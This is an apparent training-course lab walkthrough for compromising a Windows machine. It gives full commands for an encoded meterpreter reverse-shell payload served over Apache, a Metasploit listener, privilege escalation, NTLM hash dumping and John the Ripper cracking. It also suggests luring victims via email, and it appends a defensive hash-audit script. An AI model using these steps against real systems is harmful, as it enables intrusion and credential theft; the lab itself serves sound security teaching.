
Module 06: Network Penetration Testing Methodology-Internal 10

Written By AKADEMY on Wednesday, July 3, 2019 | 11:18 AM

Exercise 10: Exploiting and Escalating Privileges on a Windows Operating System

Scenario

Password hacking is one of the easiest and most common ways attackers obtain unauthorized access to a computer or network. Although strong passwords that are difficult to crack (or guess) are easy to create and maintain, users often neglect this, so passwords remain one of the weakest links in the information-security chain. Passwords rely on secrecy: once a password is compromised, its original owner is no longer the only person who can access the system with it. Attackers have many ways to obtain passwords. They can recover them from local computers with password-cracking software, or from across a network with remote cracking utilities or network analyzers. This exercise demonstrates just how easily an attacker can gather password information from your network and describes the password vulnerabilities that exist in computer networks.
The objective of this lab is to help students learn how to:
  • Exploit a vulnerable machine
  • Escalate privileges
  • Obtain password hashes
  • Crack the password hashes
Lab Duration: 30 Minutes
  1. Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the password field and click Sign In.
    Screenshot
  4. In this lab, we are going to target the IP address 172.20.20.9 (Advertisement Dept. Subnet D machine), which was identified during the ping sweep scan in the previous lab exercise.
    This lab is a part of White Box Penetration Testing, where you are given information that the machine is running on a vulnerable operating system.
  5. Click Terminal icon from the taskbar to launch the command line terminal.
    Screenshot
  6. Type the command msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=172.20.20.21 lport=443 -f exe > /root/Desktop/shikata.exe and press Enter.
    This generates a shikata_ga_nai payload in the name of shikata.exe on the Desktop.
    Screenshot
  7. Type the command service apache2 start and press Enter. Issuing this command launches the apache server which allows you to share files with remote users.
    If you are performing the lab while the Greenbone Security Assistant Daemon (gsad) is already running, the Apache server might fail to start because the port is in use. In that case, stop the OpenVAS service before starting the Apache server.
    Screenshot
  8. Open a new command line terminal and type mkdir /var/www/html/share and press Enter to create a new directory "share" in the html folder.
    Screenshot
  9. Change permissions for the share folder to 755, by entering the following command:
    chmod -R 755 /var/www/html/share/
    Screenshot
  10. Type the command cp /root/Desktop/shikata.exe /var/www/html/share and press Enter.
    Issuing the command copies the payload to share folder.
    Screenshot
  11. Type the command msfconsole and press Enter. This launches msfconsole.
    Screenshot
  12. Type the command use exploit/multi/handler in the msfconsole and press Enter. This allows msfconsole to use the multi/handler exploit.
    Screenshot
  13. Type the command set payload windows/meterpreter/reverse_tcp and press Enter. This allows msfconsole to set the meterpreter/reverse_tcp payload.
    Screenshot
  14. Issue the following commands:
    set lhost 172.20.20.21
    set lport 443
    These commands set the listener address and port: whenever a victim executes the payload shikata.exe, it connects back to the lhost (172.20.20.21) on port 443 (lport).
    Now, type show options command and press Enter. This displays the default and the configured options as shown in the screenshot.
    Screenshot
  15. Type the command exploit and press Enter. This initiates the multi/handler exploit.
    So, when the intended victim downloads the shikata.exe payload and executes it, a meterpreter session is established and the target machine comes under your control.
    In a real engagement, a pentester may share this payload with a victim through a medium such as social media, email, or a shared network drive, and entice him/her to download and execute it.
    Since this is a lab demonstration, we assume that the pentester has already sent the link and we as a victim will open the link and execute the payload.
    Screenshot
  16. Click Marketing Dept Subnet D, log in to the Administrator account and close the Server Manager window.
    The login credentials are:
    Username: Administrator
    Password: Pa$$w0rd
    You can use the Ctrl+Alt+Delete, then Type Password option from the Commands menu to enter the password.
    Screenshot
  17. Launch the Firefox web browser, type the URL http://172.20.20.21/share and press Enter.
    A webpage appears displaying the payload. Click the link shikata.exe in order to download the payload.
    If a Microsoft Windows pop-up window appears asking to restart the machine, click the Restart Later option.
    Screenshot
  18. An Opening shikata.exe pop-up appears, click Save File button to save the payload on the machine.
    Screenshot
  19. Downloads pop-up appears on the top-right corner of the webpage, displaying the shikata.exe file that has been downloaded. Click the file to execute it.
    Screenshot
  20. An Open File - Security Warning pop-up appears, click Run in order to execute the payload.
    Screenshot
  21. Once you click Run in the Advertisement Dept. Subnet D machine, a meterpreter session will be opened in the Kali Linux machine as shown in the screenshot.
    Switch to the Kali Linux (Internal Network) machine.
    Screenshot
  22. Type the command getsystem in the meterpreter shell and press Enter. This escalates your privileges to access the victim machine.
    Screenshot
  23. Type the command run hashdump and press Enter. This command extracts all the LM and NTLM hashes from the target machine and displays them, as shown in the screenshot.
    Screenshot
  24. Click the Leafpad icon (green color) on the taskbar to open a text file.
    Screenshot
  25. Switch to the command line terminal, select the hashes obtained for the users rebecca, steve, sam, and anderson, right-click on the hashes and copy them.
    Screenshot
  26. Now, paste the copied hash content into the newly opened text file.
    Screenshot
  27. Select File from the menu bar and click Save.
    Screenshot
  28. Save As window appears, type hashes.txt in the Name field and choose Desktop as the location to save the file and click Save.
    Close all the windows that were opened.
    Screenshot
  29. Now, you need to crack the password hashes. You will use the John the Ripper tool to do so.
    Before launching John the Ripper, you need to disable the CPUID check.
    To do this, launch a new command line terminal, type export CPUID_DISABLE=1 and press Enter.
    Screenshot
  30. Since the hashes that were obtained are of "nt" format, issue the command john --format=nt /root/Desktop/hashes.txt and press Enter.
    Screenshot
  31. Wait until the hashes are successfully cracked. Once they are, you will be presented with the passwords as shown in the screenshot.
    Screenshot
  32. Now you have the usernames and their respective passwords. You can use these credentials to remotely log in to the target machine.
  33. You need to take the screenshots of the established meterpreter session and the obtained password hashes and save them to the pentesting folder.
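The hashdump output saved in step 28 is in pwdump format (user:RID:LM hash:NT hash:::), which is why john is given --format=nt. The following script is an added example, not part of the original lab, that parses lines in that format and reports what a defender should fix before such a dump ever leaves the machine: accounts that still store LM hashes, accounts with an empty password, and accounts that share one password (identical NT hash). The sample lines and their hash values are constructed placeholders, not hashes from the lab machine.

```python
import re
from collections import defaultdict

# Hashes of the empty password (well-known constants, not values from the lab).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format as printed by hashdump: user:RID:LM hash:NT hash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample in that format; the hash values are placeholders, not real hashes.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
rebecca:1001:ffffffffffffffffffffffffffffffff:0123456789abcdef0123456789abcdef:::
steve:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
anderson:1003:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

def parse_hashdump(text):
    """Parse pwdump-style lines into (user, rid, lm, nt) tuples; reject other formats."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = PWDUMP_RE.match(line.strip())
        if m is None:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        records.append((user, int(rid), lm.lower(), nt.lower()))
    return records

def audit_hashes(records):
    """Map each user to the findings a defender should fix before the hashes leak."""
    users_by_nt = defaultdict(list)
    for user, _, _, nt in records:
        users_by_nt[nt].append(user)
    findings = {}
    for user, rid, lm, nt in records:
        f = []
        if lm != EMPTY_LM:
            f.append("lm_hash_stored")  # LM hashes fall to brute force in minutes
        if nt == EMPTY_NT:
            f.append("empty_password")
        elif len(users_by_nt[nt]) > 1:  # identical NT hash means identical password
            others = [u for u in users_by_nt[nt] if u != user]
            f.append("password_shared_with:" + ",".join(others))
        findings[user] = f
    return findings
```

Run `audit_hashes(parse_hashdump(SAMPLE_HASHDUMP))` to get the per-user findings; on a real dump, any non-empty list is a policy fix (disable LM hash storage, enforce non-blank unique passwords), not something to wait for a cracker to confirm.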
In this lab, you have learned how to:
  • Exploit a vulnerable machine
  • Obtain password hashes
  • Crack the password hashes